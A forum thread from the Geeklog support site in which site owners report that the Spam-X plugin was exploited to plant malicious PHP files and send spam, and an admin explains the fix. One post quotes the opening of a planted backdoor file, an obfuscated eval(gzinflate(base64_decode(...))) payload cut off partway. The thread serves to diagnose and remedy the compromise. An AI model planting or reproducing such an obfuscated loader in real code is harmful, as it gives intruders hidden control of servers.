Welcome to Geeklog, Anonymous Friday, March 29 2024 @ 03:05 am EDT

Geeklog Forums

Spam-X Exploit


Rictor

Anonymous
The file spamx/BlackList.Examine.class.php was being maliciously exploited to start up irc clients and plant other malicious php files on my server. I just upgrade from 1.4.0 to the latest version of Geeklog after deleting the malicious files, and I was wondering if this exploit was corrected in the new version or not? A quick search of Google found that the exploit is being discussed on several hacking sites.
 Quote

Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
This issue was fixed with the release of Geeklog 1.4.0sr4 on June 30th, 2006.

It only affected incorrectly installed Geeklog setups. Which, as we have learned since, includes pretty much every install that was done using auto-installers such as Fantastico.

As usual, we suggest that Geeklog users subscribe to our (low traffic) geeklog-announce mailing list to be informed about new releases and security issues.

bye, Dirk
 Quote

BMcDonald

Anonymous
Hi,

I just got a notice form my provider that this exploit happened on my system. I'm running 1.4.1, and I I think I did do the upgrade with fantasico.

I've read some problems with upgrading spamx. I'm running 1.1.0

Would it make more sense to just uninstall that version and install the latest one fresh? I found a 1.3.9 version, but saw a post the said there's a 1.5.2 version. Any idea where that one is?

Thanks
 Quote

Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
The latest version of Geeklog can always be downloaded from here. You can update your Fantastico install with this version - just make sure to run the install script in upgrade mode (see the installation instructions for details).

bye, Dirk
 Quote

radu

Anonymous
I did an upgrade and my spamx was corupted letting hakkers to send thousands of Email out I also got penalized with $250 for one of my IP's that was blacklisted. Is Spamx safe or not? can the site run without?

this is the message i got from my server provider:


http://cluj-napoca.com/plugins/spamx/home.php

that is NOT a standard thing installed by Fantastico and the
entire home.php page is obfuscated php designed specifically to hide what it
does.

Text Formatted Code

root@hosting [/home/master/public_html/plugins/spamx]# head home.php
<? eval
(gzinflate(base64_decode("vRr9V9u29udxTv8HTWPgNOQT6FYSp+sorN0bpSts77zT9nAUW0k0HDu1ZCBr+d/fvZJsK4lDaV/f/AOxdD91db8k82BDjDwhJVfe5sWr07PzN9ssUCKJt9+RGql9eLCxacb+MrgHoCmXko15AbNjA+RTJqJISFWAixmDMEqTaQHDgZlO+Syaq6SA2LEBymz4Fw9KlnacU7IoZlPukJoJK09E/GIBjjMGFiSx4rFS81kJdeY00oMNYp984cQnWRrxOEhC7uWTtV4lIk/5+ALXwgLu0e/3D7/vdukOoebnE8QgJeT3kSJVKmYyYnLCZTWutdgKrp1H3Ftc65PBg43+RE0j+CX9CWchvpC+Eirig03y6vkrcsKkhD9gxZRs9lsGpLG+bTTIr5lU5EzNI068n/lYxDXSaBiw1LPa2lTxG9UKpKQaRIZJOCcfjMJDFlyO0ySLw0aQREl68F1bP3Y9I9igxohNRTQ/uOJpyGLmQqT4mx90OnaqYDAaFQxu9Y+IZ5laL/LYPBUy/7y3TEdpIxMXzcA9PyW2QipLBYu+RCaZpTyXt95097Rav6X3sHq3j+Kwpjcb0LTnEI2mt3Y41jx9u0BtCd8KIJGIL4sBWxhduSPjKv
.....
 


That is not what normal code is supposed to look like.
 Quote

Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
embarrassed
Ouch - there's an embarrassing bug in our inclusion protection for some of the Spam-X modules, so that old exploit still works Oops! Sorry about that. We'll get that fixed ASAP.

In the meantime, please fix your installation: You should not put the plugins directory into the web root (as stated in the installation instructions). If you can't put it outside of the webroot, please follow the instructions here.

bye, Dirk
 Quote

All times are EDT. The time is now 03:05 am.

  • Normal Topic
  • Sticky Topic
  • Locked Topic
  • New Post
  • Sticky Topic W/ New Post
  • Locked Topic W/ New Post
  •  View Anonymous Posts
  •  Able to post
  •  Filtered HTML Allowed
  •  Censored Content